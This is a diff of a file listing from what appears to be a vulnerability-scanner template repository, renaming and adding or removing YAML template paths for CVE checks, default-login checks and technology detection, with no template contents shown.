./poc/cve/cve-2021-46387-6600.yaml ./poc/cve/cve-2021-46387-6601.yaml -./poc/cve/cve-2021-46417(1).yaml ./poc/cve/cve-2021-46417-6602.yaml +./poc/cve/cve-2021-46422.yaml +./poc/cve/cve-2021-46424.yaml ./poc/cve/cve-2022-0140-6603.yaml ./poc/cve/cve-2022-0148-6604.yaml ./poc/cve/cve-2022-0148-6605.yaml @@ -25826,8 +25854,9 @@ ./poc/cve/cve-2022-0437-6632.yaml ./poc/cve/cve-2022-0482-6633.yaml ./poc/cve/cve-2022-0482-6634.yaml -./poc/cve/cve-2022-0540.yaml +./poc/cve/cve-2022-0540(1).yaml ./poc/cve/cve-2022-0543-6635.yaml +./poc/cve/cve-2022-0543.yaml ./poc/cve/cve-2022-0591-6636.yaml ./poc/cve/cve-2022-0591-6637.yaml ./poc/cve/cve-2022-0653-6638.yaml @@ -25835,15 +25864,17 @@ ./poc/cve/cve-2022-0653-6640.yaml ./poc/cve/cve-2022-0653-6641.yaml ./poc/cve/cve-2022-0656-6642.yaml +./poc/cve/cve-2022-0660(1).yaml ./poc/cve/cve-2022-0692-6643.yaml ./poc/cve/cve-2022-0692-6644.yaml ./poc/cve/cve-2022-0692-6645.yaml ./poc/cve/cve-2022-0692-6646.yaml -./poc/cve/cve-2022-0776(1).yaml +./poc/cve/cve-2022-0776.yaml +./poc/cve/cve-2022-0870.yaml +./poc/cve/cve-2022-0921.yaml ./poc/cve/cve-2022-0963.yaml ./poc/cve/cve-2022-0968.yaml ./poc/cve/cve-2022-1040-6647.yaml -./poc/cve/cve-2022-1040.yaml ./poc/cve/cve-2022-1119-6648.yaml ./poc/cve/cve-2022-1388-6649.yaml ./poc/cve/cve-2022-1388-6650.yaml @@ -25853,17 +25884,17 @@ ./poc/cve/cve-2022-1598-6653.yaml ./poc/cve/cve-2022-1598-6654.yaml ./poc/cve/cve-2022-1609-6655.yaml +./poc/cve/cve-2022-1713(1).yaml ./poc/cve/cve-2022-1713-6656.yaml -./poc/cve/cve-2022-1713.yaml ./poc/cve/cve-2022-1815.yaml ./poc/cve/cve-2022-21371-6657.yaml ./poc/cve/cve-2022-21371-6658.yaml -./poc/cve/cve-2022-21500(1).yaml +./poc/cve/cve-2022-21371-6659.yaml ./poc/cve/cve-2022-21500-6660.yaml ./poc/cve/cve-2022-21705(1).yaml ./poc/cve/cve-2022-22536-6661.yaml ./poc/cve/cve-2022-22536-6662.yaml -./poc/cve/cve-2022-2290(1).yaml +./poc/cve/cve-2022-2290.yaml ./poc/cve/cve-2022-22947-6663.yaml ./poc/cve/cve-2022-22947-6664.yaml ./poc/cve/cve-2022-22947-6665.yaml @@ -25907,17 +25938,17 @@ ./poc/cve/cve-2022-24124-6705.yaml ./poc/cve/cve-2022-24129-6706.yaml ./poc/cve/cve-2022-24129-6707.yaml -./poc/cve/cve-2022-24129.yaml +./poc/cve/cve-2022-24181(1).yaml ./poc/cve/cve-2022-24260-6708.yaml ./poc/cve/cve-2022-24260-6709.yaml ./poc/cve/cve-2022-24288-6710.yaml ./poc/cve/cve-2022-24288-6711.yaml ./poc/cve/cve-2022-24288-6712.yaml -./poc/cve/cve-2022-24681.yaml +./poc/cve/cve-2022-24681(1).yaml +./poc/cve/cve-2022-24856(1).yaml ./poc/cve/cve-2022-24856-6713.yaml -./poc/cve/cve-2022-24856.yaml -./poc/cve/cve-2022-2487.yaml -./poc/cve/cve-2022-2488(1).yaml +./poc/cve/cve-2022-2486.yaml +./poc/cve/cve-2022-2488.yaml ./poc/cve/cve-2022-24899(1).yaml ./poc/cve/cve-2022-24900-6714.yaml ./poc/cve/cve-2022-24990-6715.yaml @@ -25933,7 +25964,8 @@ ./poc/cve/cve-2022-25369-6725.yaml ./poc/cve/cve-2022-25369-6726.yaml ./poc/cve/cve-2022-25369-6727.yaml -./poc/cve/cve-2022-26135(1).yaml +./poc/cve/cve-2022-26135.yaml +./poc/cve/cve-2022-26138(1).yaml ./poc/cve/cve-2022-26138-6728.yaml ./poc/cve/cve-2022-26148-6729.yaml ./poc/cve/cve-2022-26148-6730.yaml @@ -25945,61 +25977,53 @@ ./poc/cve/cve-2022-26233-6736.yaml ./poc/cve/cve-2022-26352-6737.yaml ./poc/cve/cve-2022-26352-6738.yaml -./poc/cve/cve-2022-26352.yaml -./poc/cve/cve-2022-26564(1).yaml ./poc/cve/cve-2022-26564-6739.yaml -./poc/cve/cve-2022-26960(1).yaml +./poc/cve/cve-2022-26564.yaml +./poc/cve/cve-2022-26960.yaml ./poc/cve/cve-2022-27849-6740.yaml ./poc/cve/cve-2022-27849-6741.yaml ./poc/cve/cve-2022-28079-6742.yaml +./poc/cve/cve-2022-28079.yaml ./poc/cve/cve-2022-28080-6743.yaml -./poc/cve/cve-2022-28080.yaml ./poc/cve/cve-2022-28219.yaml ./poc/cve/cve-2022-28363-6744.yaml ./poc/cve/cve-2022-28363-6745.yaml ./poc/cve/cve-2022-28365-6746.yaml ./poc/cve/cve-2022-28365-6747.yaml -./poc/cve/cve-2022-29014(1).yaml ./poc/cve/cve-2022-29014-6748.yaml ./poc/cve/cve-2022-29298-6749.yaml -./poc/cve/cve-2022-29301.yaml +./poc/cve/cve-2022-29299.yaml +./poc/cve/cve-2022-29301(1).yaml ./poc/cve/cve-2022-29303-6750.yaml ./poc/cve/cve-2022-29303-6751.yaml ./poc/cve/cve-2022-29303-6752.yaml -./poc/cve/cve-2022-29383(1).yaml +./poc/cve/cve-2022-29383.yaml ./poc/cve/cve-2022-29464-6753.yaml -./poc/cve/cve-2022-29464.yaml ./poc/cve/cve-2022-29548-6754.yaml +./poc/cve/cve-2022-29548.yaml ./poc/cve/cve-2022-30073.yaml -./poc/cve/cve-2022-30489.yaml ./poc/cve/cve-2022-30525-6755.yaml ./poc/cve/cve-2022-30776(1).yaml ./poc/cve/cve-2022-30777.yaml -./poc/cve/cve-2022-31268(1).yaml ./poc/cve/cve-2022-31268-6756.yaml ./poc/cve/cve-2022-31268-6757.yaml -./poc/cve/cve-2022-31373.yaml -./poc/cve/cve-2022-32015.yaml +./poc/cve/cve-2022-31268.yaml +./poc/cve/cve-2022-31793(1).yaml ./poc/cve/cve-2022-32018.yaml -./poc/cve/cve-2022-32022(1).yaml -./poc/cve/cve-2022-32024.yaml -./poc/cve/cve-2022-32025.yaml -./poc/cve/cve-2022-32026.yaml -./poc/cve/cve-2022-32159.yaml +./poc/cve/cve-2022-32024(1).yaml +./poc/cve/cve-2022-32026(1).yaml +./poc/cve/cve-2022-32028(1).yaml ./poc/cve/cve-2022-32409-6758.yaml ./poc/cve/cve-2022-32444-6759.yaml ./poc/cve/cve-2022-32444-6760.yaml +./poc/cve/cve-2022-33119(1).yaml ./poc/cve/cve-2022-33174-6761.yaml -./poc/cve/cve-2022-33174.yaml ./poc/cve/cve-2022-34046-6762.yaml ./poc/cve/cve-2022-34047-6763.yaml -./poc/cve/cve-2022-34048(1).yaml -./poc/cve/cve-2022-35416(1).yaml -./poc/cve/cve-2022-36883(1).yaml -./poc/cve/cve-2022-40684.yaml +./poc/cve/cve-2022-34048.yaml +./poc/cve/cve-2022-34049(1).yaml +./poc/cve/cve-2022-36883.yaml ./poc/cve/cve-2022-42889.yaml -./poc/cve/cve-2023-2523.yaml -./poc/cve/cve-2023-28432.yaml ./poc/cve/cve-2023-33246.yaml ./poc/cve/cve-2024-23334.yaml ./poc/cve/cve-2024-23897.yaml @@ -26120,7 +26144,7 @@ ./poc/cve/rconfig-cve-2019-16663.yml ./poc/cve/resin-cnnvd-200705-315-9865.yaml ./poc/cve/resin-cnnvd-200705-315-9866.yaml -./poc/cve/resin-cnnvd-200705-315-9867.yaml +./poc/cve/resin-cnnvd-200705-315.yaml ./poc/cve/resin-cnnvd-200705-315.yml ./poc/cve/ruijie-eweb-rce-cnvd-2021-09650.yml ./poc/cve/ruijie-uac-cnvd-2021-14536.yml @@ -26186,10 +26210,10 @@ ./poc/debug/airflow-debug.yaml ./poc/debug/ampache-debug-page.yaml ./poc/debug/ampache-debug.yaml -./poc/debug/android-debug-database-exposed-312.yaml ./poc/debug/android-debug-database-exposed-313.yaml ./poc/debug/android-debug-database-exposed-314.yaml ./poc/debug/android-debug-database-exposed-315.yaml +./poc/debug/android-debug-database-exposed.yaml ./poc/debug/android-manifest-debuggable-enabled.yaml ./poc/debug/aspx-debug-mode-576.yaml ./poc/debug/aspx-debug-mode-577.yaml @@ -26296,7 +26320,7 @@ ./poc/debug/symfony-debugmode-10620.yaml ./poc/debug/symfony-debugmode-10621.yaml ./poc/debug/symfony-debugmode-10622.yaml -./poc/debug/symfony-debugmode.yaml +./poc/debug/symfony-debugmode-10623.yaml ./poc/debug/thinkphp-debug-detected.yaml ./poc/debug/wamp-xdebug-detect-11100.yaml ./poc/debug/wamp-xdebug-detect-11101.yaml @@ -26334,7 +26358,7 @@ ./poc/default/3com-nj2000-default-login.yaml ./poc/default/Chinaunicom-Default-Login.yaml ./poc/default/HikvisionIntercom-Service-DefaultPassword.yaml -./poc/default/JeeSite-default-login.yaml +./poc/default/Kingsoft-default-login.yaml ./poc/default/Konga-default-login.yaml ./poc/default/MinIO-default-login.yaml ./poc/default/activemq-default-login-44.yaml @@ -26363,7 +26387,6 @@ ./poc/default/aem-default-get-servlet-135.yaml ./poc/default/aem-default-get-servlet-136.yaml ./poc/default/aem-default-get-servlet-137.yaml -./poc/default/aem-default-get-servlet-138.yaml ./poc/default/aem-default-get-servlet-139.yaml ./poc/default/aem-default-get-servlet-14.yaml ./poc/default/aem-default-get-servlet-15.yaml @@ -26416,6 +26439,7 @@ ./poc/default/aem-default-get-servlet-7.yaml ./poc/default/aem-default-get-servlet-8.yaml ./poc/default/aem-default-get-servlet-9.yaml +./poc/default/aem-default-get-servlet.yaml ./poc/default/aem-default-login-140.yaml ./poc/default/aem-default-login-141.yaml ./poc/default/aem-default-login-142.yaml @@ -26526,9 +26550,9 @@ ./poc/default/datang-ac-default-password-cnvd-2021-04128.yml ./poc/default/datang-ac-default-password.yaml ./poc/default/default-apache-test-all-6812.yaml -./poc/default/default-apache-test-all-6813.yaml ./poc/default/default-apache-test-all-6814.yaml ./poc/default/default-apache-test-all-6815.yaml +./poc/default/default-apache-test-all.yaml ./poc/default/default-apache-test-page-6817.yaml ./poc/default/default-apache-test-page-6818.yaml ./poc/default/default-apache-test-page-6819.yaml @@ -26538,10 +26562,10 @@ ./poc/default/default-apache2-page-6806.yaml ./poc/default/default-apache2-page-6807.yaml ./poc/default/default-apache2-page.yaml +./poc/default/default-apache2-ubuntu-page-6808.yaml ./poc/default/default-apache2-ubuntu-page-6809.yaml ./poc/default/default-apache2-ubuntu-page-6810.yaml ./poc/default/default-apache2-ubuntu-page-6811.yaml -./poc/default/default-apache2-ubuntu-page.yaml ./poc/default/default-application-workflow.yaml ./poc/default/default-asp-6823.yaml ./poc/default/default-asp-net-page-6820.yaml @@ -26565,10 +26589,10 @@ ./poc/default/default-detect-generic-6837.yaml ./poc/default/default-detect-generic-6839.yaml ./poc/default/default-detect-generic.yaml -./poc/default/default-django-page-6840.yaml ./poc/default/default-django-page-6841.yaml ./poc/default/default-django-page-6842.yaml ./poc/default/default-django-page-6843.yaml +./poc/default/default-django-page.yaml ./poc/default/default-fastcgi-page-6844.yaml ./poc/default/default-fastcgi-page-6845.yaml ./poc/default/default-fastcgi-page-6846.yaml @@ -26584,16 +26608,16 @@ ./poc/default/default-glassfish-server-page.yaml ./poc/default/default-ibm-http-server-6856.yaml ./poc/default/default-ibm-http-server.yaml +./poc/default/default-iis7-page-6858.yaml ./poc/default/default-iis7-page-6859.yaml ./poc/default/default-iis7-page-6860.yaml ./poc/default/default-iis7-page-6861.yaml -./poc/default/default-iis7-page.yaml ./poc/default/default-jetty-page-6863.yaml ./poc/default/default-jetty-page-6864.yaml ./poc/default/default-jetty-page-6865.yaml ./poc/default/default-jetty-page.yaml +./poc/default/default-lighttpd-page-6866.yaml ./poc/default/default-lighttpd-page-6867.yaml -./poc/default/default-lighttpd-page.yaml ./poc/default/default-lighttpd-placeholder-page.yaml ./poc/default/default-lucee-page-6868.yaml ./poc/default/default-lucee-page-6869.yaml @@ -26630,10 +26654,10 @@ ./poc/default/default-payara-server-page-6896.yaml ./poc/default/default-payara-server-page-6897.yaml ./poc/default/default-payara-server-page.yaml +./poc/default/default-plesk-page-6898.yaml ./poc/default/default-plesk-page-6899.yaml ./poc/default/default-plesk-page-6900.yaml ./poc/default/default-plesk-page-6901.yaml -./poc/default/default-plesk-page.yaml ./poc/default/default-redhat-test-page-6902.yaml ./poc/default/default-redhat-test-page-6903.yaml ./poc/default/default-redhat-test-page-6904.yaml @@ -26665,8 +26689,8 @@ ./poc/default/dell-idrac9-default-login-6931.yaml ./poc/default/dell-idrac9-default-login-6932.yaml ./poc/default/dell-idrac9-default-login-6933.yaml -./poc/default/dell-idrac9-default-login-6934.yaml ./poc/default/dell-idrac9-default-login-6935.yaml +./poc/default/dell-idrac9-default-login.yaml ./poc/default/dell-idrac9-default-password.yaml ./poc/default/dell-remote-power-management-default-login.yaml ./poc/default/digitalrebar-default-login.yaml @@ -26743,7 +26767,7 @@ ./poc/default/goip-default-login.yaml ./poc/default/gophish-default-login-7792.yaml ./poc/default/gophish-default-login-7793.yaml -./poc/default/gophish-default-login-7794.yaml +./poc/default/gophish-default-login.yaml ./poc/default/grafana-default-credential-1.yaml ./poc/default/grafana-default-credential-2.yaml ./poc/default/grafana-default-credential.yaml @@ -26814,6 +26838,7 @@ ./poc/default/iptime-default-login.yaml ./poc/default/jboss-default-password.yaml ./poc/default/jboss-jbpm-default-login.yaml +./poc/default/jeesite-default-login.yaml ./poc/default/jenkins-default-8270.yaml ./poc/default/jenkins-default-8271.yaml ./poc/default/jenkins-default-8272.yaml @@ -26841,7 +26866,6 @@ ./poc/default/kanboard-default-login.yaml ./poc/default/karaf-default-login.yaml ./poc/default/kettle-default-login.yaml -./poc/default/kingsoft-default-login.yaml ./poc/default/kingsoft-v8-default-login.yaml ./poc/default/kingsoft-v8-default-password.yml ./poc/default/konga-default-jwt-key.yaml @@ -26876,7 +26900,7 @@ ./poc/default/mobotix-default-login.yaml ./poc/default/mofi4500-default-login-8912.yaml ./poc/default/mofi4500-default-login-8913.yaml -./poc/default/mofi4500-default-login.yaml +./poc/default/mofi4500-default-login-8914.yaml ./poc/default/mofi4500-default-password.yaml ./poc/default/nacos-default-password.yaml ./poc/default/nagios-default-credential-8988.yaml @@ -26898,7 +26922,7 @@ ./poc/default/nexus-default-login-9086.yaml ./poc/default/nexus-default-login-9087.yaml ./poc/default/nexus-default-login-9088.yaml -./poc/default/nexus-default-login.yaml +./poc/default/nexus-default-login-9089.yaml ./poc/default/nexus-default-password-9091.yaml ./poc/default/nexus-default-password.yaml ./poc/default/nexus-default-password.yml @@ -26985,7 +27009,7 @@ ./poc/default/rainloop-default-login.yaml ./poc/default/rancher-default-login-9814.yaml ./poc/default/rancher-default-login-9815.yaml -./poc/default/rancher-default-login.yaml +./poc/default/rancher-default-login-9816.yaml ./poc/default/rancher-default-password.yaml ./poc/default/ranger-default-login-9827.yaml ./poc/default/ranger-default-login-9828.yaml @@ -26999,7 +27023,7 @@ ./poc/default/rockmongo-default-login-9897.yaml ./poc/default/rockmongo-default-login-9898.yaml ./poc/default/rockmongo-default-login-9899.yaml -./poc/default/rockmongo-default-login.yaml +./poc/default/rockmongo-default-login-9900.yaml ./poc/default/rockmongo-default-password.yml ./poc/default/rseenet-default-login-9913.yaml ./poc/default/rseenet-default-login-9914.yaml @@ -27046,15 +27070,15 @@ ./poc/default/smartsense-default-login-10328.yaml ./poc/default/smartsense-default-login-10329.yaml ./poc/default/smartsense-default-login-10330.yaml -./poc/default/smartsense-default-login.yaml +./poc/default/smartsense-default-login-10331.yaml ./poc/default/solarwinds-default-admin-1.yaml ./poc/default/solarwinds-default-admin-2.yaml ./poc/default/solarwinds-default-admin.yaml ./poc/default/solarwinds-default-login-1.yaml ./poc/default/solarwinds-default-login-10354.yaml ./poc/default/solarwinds-default-login-10355.yaml +./poc/default/solarwinds-default-login-10356.yaml ./poc/default/solarwinds-default-login-2.yaml -./poc/default/solarwinds-default-login.yaml ./poc/default/spectracom-default-credential.yaml ./poc/default/spectracom-default-login-10403.yaml ./poc/default/spectracom-default-login-10404.yaml @@ -27130,7 +27154,7 @@ ./poc/default/utt-default-password.yaml ./poc/default/versa-default-login-11002.yaml ./poc/default/versa-default-login-11003.yaml -./poc/default/versa-default-login.yaml +./poc/default/versa-default-login-11004.yaml ./poc/default/versa-default-password.yaml ./poc/default/versa-flexvnf-default-login.yaml ./poc/default/versa-flexvnf-ui-default-login.yaml @@ -27176,7 +27200,7 @@ ./poc/default/xerox-workcentre7-default-password.yaml ./poc/default/xerox7-default-login-11678.yaml ./poc/default/xerox7-default-login-11679.yaml -./poc/default/xerox7-default-login-11680.yaml +./poc/default/xerox7-default-login.yaml ./poc/default/xerox7-default-password.yaml ./poc/default/xnat-default-login.yaml ./poc/default/xploitspy-default-login.yaml @@ -27193,7 +27217,7 @@ ./poc/default/zabbix-default-login-11760.yaml ./poc/default/zabbix-default-login-11761.yaml ./poc/default/zabbix-default-login-11762.yaml -./poc/default/zabbix-default-login-11763.yaml +./poc/default/zabbix-default-login.yaml ./poc/default/zabbix-default-password.yml ./poc/default/zmanda-default-credential.yaml ./poc/default/zmanda-default-login-11825.yaml @@ -27247,7 +27271,7 @@ ./poc/detect/aem-detection-143.yaml ./poc/detect/aem-detection-144.yaml ./poc/detect/aem-detection-145.yaml -./poc/detect/aem-detection-146.yaml +./poc/detect/aem-detection.yaml ./poc/detect/aerocms-detect.yaml ./poc/detect/airflow-detect-237.yaml ./poc/detect/airflow-detect-238.yaml @@ -27258,7 +27282,7 @@ ./poc/detect/akamai-detect.yaml ./poc/detect/alfresco-detect-258.yaml ./poc/detect/alfresco-detect-259.yaml -./poc/detect/alfresco-detect-260.yaml +./poc/detect/alfresco-detect.yaml ./poc/detect/amazon-ec2-detect.yaml ./poc/detect/amazon-mws-auth-token-detect.yaml ./poc/detect/amazon-sns-topic-disclosure-detect.yaml @@ -27280,11 +27304,11 @@ ./poc/detect/apache-detect-349.yaml ./poc/detect/apache-detect.yaml ./poc/detect/apache-druid-detect.yaml -./poc/detect/apache-dubbo-detect-351.yaml +./poc/detect/apache-dubbo-detect.yaml ./poc/detect/apache-tapestry-detect.yaml ./poc/detect/apache-zeppelin-detect.yaml +./poc/detect/apollo-server-detect-522.yaml ./poc/detect/apollo-server-detect-523.yaml -./poc/detect/apollo-server-detect.yaml ./poc/detect/appcms-detect.yaml ./poc/detect/aptus-detect.yaml ./poc/detect/aqua-enterprise-detect.yaml @@ -27292,8 +27316,8 @@ ./poc/detect/arris-modem-detect.yaml ./poc/detect/artica-web-proxy-detect-543.yaml ./poc/detect/artica-web-proxy-detect-544.yaml -./poc/detect/artica-web-proxy-detect-545.yaml ./poc/detect/artica-web-proxy-detect-546.yaml +./poc/detect/artica-web-proxy-detect.yaml ./poc/detect/artifactory-version-detect.yaml ./poc/detect/aspnet-version-detect.yaml ./poc/detect/atlantis-detect.yaml @@ -27308,8 +27332,8 @@ ./poc/detect/avantfax-detect-599.yaml ./poc/detect/avantfax-detect-600.yaml ./poc/detect/avantfax-detect.yaml -./poc/detect/aviatrix-detect-606.yaml ./poc/detect/aviatrix-detect-607.yaml +./poc/detect/aviatrix-detect.yaml ./poc/detect/avideo-detect.yaml ./poc/detect/aws-elastic-beanstalk-detect-642.yaml ./poc/detect/aws-elastic-beanstalk-detect-643.yaml @@ -27333,7 +27357,7 @@ ./poc/detect/bedita-detect.yaml ./poc/detect/besu-server-detect.yaml ./poc/detect/bigbluebutton-detect-722.yaml -./poc/detect/bigbluebutton-detect-723.yaml +./poc/detect/bigbluebutton-detect.yaml ./poc/detect/bigip-config-utility-detect-1.yaml ./poc/detect/bigip-config-utility-detect-2.yaml ./poc/detect/bigip-config-utility-detect-3.yaml @@ -27390,9 +27414,9 @@ ./poc/detect/cisco-webvpn-detect.yaml ./poc/detect/citrix-adc-gateway-detect-1.yaml ./poc/detect/citrix-adc-gateway-detect-2.yaml -./poc/detect/citrix-adc-gateway-detect-981.yaml ./poc/detect/citrix-adc-gateway-detect-982.yaml ./poc/detect/citrix-adc-gateway-detect-983.yaml +./poc/detect/citrix-adc-gateway-detect.yaml ./poc/detect/citrix-honeypot-detection.yaml ./poc/detect/citrix-netscaler-gateway-detect.yml ./poc/detect/citrix-vpn-detect-985.yaml @@ -27414,9 +27438,9 @@ ./poc/detect/cobbler-version-detect.yaml ./poc/detect/cockpit-detect-1125.yaml ./poc/detect/cockpit-detect-1126.yaml -./poc/detect/cockpit-detect-1127.yaml ./poc/detect/cockpit-detect-1128.yaml -./poc/detect/cofense-vision-detection.yml +./poc/detect/cockpit-detect.yaml +./poc/detect/cofense-vision-detection.yaml ./poc/detect/colasoft-network-information-comprehensive-detection-and-processing-platform.yaml ./poc/detect/coming-soon-page-detect.yaml ./poc/detect/compalex-panel-detect.yaml @@ -27425,10 +27449,10 @@ ./poc/detect/confluence-detect-1186.yaml ./poc/detect/confluence-detect-1187.yaml ./poc/detect/confluence-detect-1188.yaml -./poc/detect/confluence-detect-1189.yaml ./poc/detect/confluence-detect-2.yaml ./poc/detect/confluence-detect-3.yaml ./poc/detect/confluence-detect-4.yaml +./poc/detect/confluence-detect.yaml ./poc/detect/connectwise-control-detect.yaml ./poc/detect/conpot-siemens-honeypot-detection.yaml ./poc/detect/contentkeeper-detect-1202.yaml @@ -27440,13 +27464,13 @@ ./poc/detect/cpanel-detection.yaml ./poc/detect/cql-native-transport-detect.yaml ./poc/detect/craft-cms-detect-1246.yaml -./poc/detect/craft-cms-detect-1247.yaml ./poc/detect/craft-cms-detect-1248.yaml +./poc/detect/craft-cms-detect.yaml ./poc/detect/crush-ftp-detect-1270.yaml ./poc/detect/crush-ftp-detect-1271.yaml -./poc/detect/crush-ftp-detect.yaml +./poc/detect/crush-ftp-detect-1272.yaml +./poc/detect/csrfguard-detect-1290.yaml ./poc/detect/csrfguard-detect-1291.yaml -./poc/detect/csrfguard-detect.yaml ./poc/detect/ctcms-detect.yaml ./poc/detect/custom-aem-ACPV-detect.yaml ./poc/detect/custom-api-server-detect.yaml @@ -27503,9 +27527,9 @@ ./poc/detect/dell-idrac7-detect-6925.yaml ./poc/detect/dell-idrac7-detect.yaml ./poc/detect/dell-idrac8-detect-6926.yaml -./poc/detect/dell-idrac8-detect-6927.yaml ./poc/detect/dell-idrac8-detect-6928.yaml ./poc/detect/dell-idrac8-detect-6929.yaml +./poc/detect/dell-idrac8-detect.yaml ./poc/detect/dell-idrac9-detect-6936.yaml ./poc/detect/dell-idrac9-detect-6937.yaml ./poc/detect/dell-idrac9-detect-6938.yaml @@ -27515,8 +27539,8 @@ ./poc/detect/dell-remote-power-management-detect.yaml ./poc/detect/deprecated-sshv1-detection.yaml ./poc/detect/detect-addpac-voip-gateway-6963.yaml -./poc/detect/detect-addpac-voip-gateway-6964.yaml ./poc/detect/detect-addpac-voip-gateway-6965.yaml +./poc/detect/detect-addpac-voip-gateway.yaml ./poc/detect/detect-all-takeover.yaml ./poc/detect/detect-all-takeovers.yaml ./poc/detect/detect-all-takovers.yaml @@ -27536,7 +27560,7 @@ ./poc/detect/detect-jabber-xmpp.yaml ./poc/detect/detect-options-method-6976.yaml ./poc/detect/detect-options-method-6977.yaml -./poc/detect/detect-options-method.yaml +./poc/detect/detect-options-method-6978.yaml ./poc/detect/detect-rsyncd-6979.yaml ./poc/detect/detect-rsyncd-6981.yaml ./poc/detect/detect-rsyncd-6982.yaml @@ -27566,13 +27590,13 @@ ./poc/detect/django-debug-detect.yaml ./poc/detect/dmarc-detect.yaml ./poc/detect/dns-saas-service-detection.yaml +./poc/detect/dns-waf-detect-7052.yaml ./poc/detect/dns-waf-detect-7053.yaml ./poc/detect/dns-waf-detect-7054.yaml -./poc/detect/dns-waf-detect.yaml ./poc/detect/dnssec-detection.yaml ./poc/detect/docker-api-detection.yaml +./poc/detect/dolibarr-detect-7069.yaml ./poc/detect/dolibarr-detect-7070.yaml -./poc/detect/dolibarr-detect-7071.yaml ./poc/detect/dolibarr-detect.yaml ./poc/detect/dotclear-detect-2.yaml ./poc/detect/dotclear-detect-7082.yaml @@ -27637,11 +27661,11 @@ ./poc/detect/fanruanoa-detect-1.yaml ./poc/detect/fanruanoa-detect-2.yaml ./poc/detect/fanruanoa-detect-7391.yaml -./poc/detect/fanruanoa-detect-7392.yaml +./poc/detect/fanruanoa-detect.yaml ./poc/detect/fanruanoa2012-detect-7387.yaml -./poc/detect/fanruanoa2012-detect.yaml -./poc/detect/fatpipe-mpvpn-detect-7437.yaml +./poc/detect/fanruanoa2012-detect-7388.yaml ./poc/detect/fatpipe-mpvpn-detect-7438.yaml +./poc/detect/fatpipe-mpvpn-detect.yaml ./poc/detect/fatpipe-warp-detect-7439.yaml ./poc/detect/fatpipe-warp-detect-7440.yaml ./poc/detect/favicon-detect.yaml @@ -27666,7 +27690,7 @@ ./poc/detect/fortiauthenticator-detect.yaml ./poc/detect/fortinet-detect.yaml ./poc/detect/froxlor-detect-7551.yaml -./poc/detect/froxlor-detect-7552.yaml +./poc/detect/froxlor-detect-7553.yaml ./poc/detect/froxlor-detect-7554.yaml ./poc/detect/froxlor-detect.yaml ./poc/detect/fuji-xerox-printer-detect.yaml @@ -27713,7 +27737,7 @@ ./poc/detect/glpi-cms-detect.yaml ./poc/detect/glpi-project-detect.yaml ./poc/detect/gnu-inetutils-ftpd-detect.yaml -./poc/detect/gnuboard-detect.yaml +./poc/detect/gnuboard-detect-7742.yaml ./poc/detect/goahead-detected.yaml ./poc/detect/goliath-detect.yaml ./poc/detect/gopher-detect.yaml @@ -27758,9 +27782,9 @@ ./poc/detect/grav-cms-detect-7845.yaml ./poc/detect/grav-cms-detect.yaml ./poc/detect/gunicorn-detect-7862.yaml +./poc/detect/gunicorn-detect-7863.yaml ./poc/detect/gunicorn-detect-7864.yaml ./poc/detect/gunicorn-detect-7865.yaml -./poc/detect/gunicorn-detect.yaml ./poc/detect/hanwang-detect-7881.yaml ./poc/detect/hanwang-detect-7882.yaml ./poc/detect/hanwang-detect.yaml @@ -27784,7 +27808,7 @@ ./poc/detect/hikvision-detection.yaml ./poc/detect/home-assistant-detect.yaml ./poc/detect/hp-blade-admin-detect-8003.yaml -./poc/detect/hp-blade-admin-detect-8005.yaml +./poc/detect/hp-blade-admin-detect-8004.yaml ./poc/detect/hp-blade-admin-detect.yaml ./poc/detect/hp-color-laserjet-detect-8006.yaml ./poc/detect/hp-color-laserjet-detect.yaml @@ -27808,14 +27832,14 @@ ./poc/detect/ibm-aspera-version-detect.yaml ./poc/detect/ibm-odm-detect.yaml ./poc/detect/ibm-sterling-detect-8121.yaml -./poc/detect/ibm-sterling-detect.yaml +./poc/detect/ibm-sterling-detect-8122.yaml ./poc/detect/icecast-mediaserver-detect.yaml ./poc/detect/icecast-server-detect.yaml ./poc/detect/icewarp-panel-detect.yaml ./poc/detect/iis-detect.yaml ./poc/detect/iis-errorpage-detection-all-lang.yaml ./poc/detect/ilo-detect-8154.yaml -./poc/detect/ilo-detect-8155.yaml +./poc/detect/ilo-detect-8156.yaml ./poc/detect/ilo-detect-8157.yaml ./poc/detect/ilo-detect.yaml ./poc/detect/ilo-upnp-detect.yaml @@ -28088,8 +28112,8 @@ ./poc/detect/nextcloud-detect.yaml ./poc/detect/nexus-detect-9092.yaml ./poc/detect/nexus-detect-9093.yaml -./poc/detect/nexus-detect-9094.yaml ./poc/detect/nexus-detect-9095.yaml +./poc/detect/nexus-detect.yaml ./poc/detect/nexus-oss-detect.yaml ./poc/detect/nginx-Detect.yaml ./poc/detect/nginx-server-detection.yaml @@ -28357,7 +28381,7 @@ ./poc/detect/securityspy-detect.yaml ./poc/detect/seeddms-detect-10129.yaml ./poc/detect/seeddms-detect-10130.yaml -./poc/detect/seeddms-detect-10131.yaml +./poc/detect/seeddms-detect.yaml ./poc/detect/server-backup-manager-se-login-detect.yaml ./poc/detect/shiro-deserialization-detection.yaml ./poc/detect/shiro-detect-10195.yaml @@ -28564,8 +28588,8 @@ ./poc/detect/web-framework-detect.yaml ./poc/detect/web-ftp-detect-11135.yaml ./poc/detect/web-ftp-detect-11136.yaml +./poc/detect/web-ftp-detect-11137.yaml ./poc/detect/web-ftp-detect-11138.yaml -./poc/detect/web-ftp-detect.yaml ./poc/detect/web-suite-detect-11168.yaml ./poc/detect/web-suite-detect.yaml ./poc/detect/webeditors-check-detect.yaml @@ -28620,7 +28644,6 @@ ./poc/detect/worksites-detection-11386.yaml ./poc/detect/worksites-detection.yaml ./poc/detect/workspaceone-uem-airwatch-dashboard-detect.yaml -./poc/detect/wowza-streaming-detect.yaml ./poc/detect/wp-admin-detect.yaml ./poc/detect/wp-detect (copy 1).yaml ./poc/detect/wp-mobile-detector-8331db47f79376a823a4cbdb5537e3cf.yaml @@ -28858,7 +28881,7 @@ ./poc/docker/exposed-docker-api-1.yaml ./poc/docker/exposed-docker-api-2.yaml ./poc/docker/exposed-docker-api-7299.yaml -./poc/docker/exposed-docker-api-7300.yaml +./poc/docker/exposed-docker-api.yaml ./poc/docker/exposed-dockerd.yaml ./poc/docker/kubernetes-api-detect.yaml ./poc/docker/kubernetes-dashboard-8526.yaml @@ -28935,9 +28958,9 @@ ./poc/drupal/drupal-user-enum-redirect-2.yaml ./poc/drupal/drupal-user-enum-redirect-3.yaml ./poc/drupal/drupal-user-enum-redirect-4.yaml -./poc/drupal/drupal-user-enum-redirect-7112.yaml ./poc/drupal/drupal-user-enum-redirect-7113.yaml ./poc/drupal/drupal-user-enum-redirect-7115.yaml 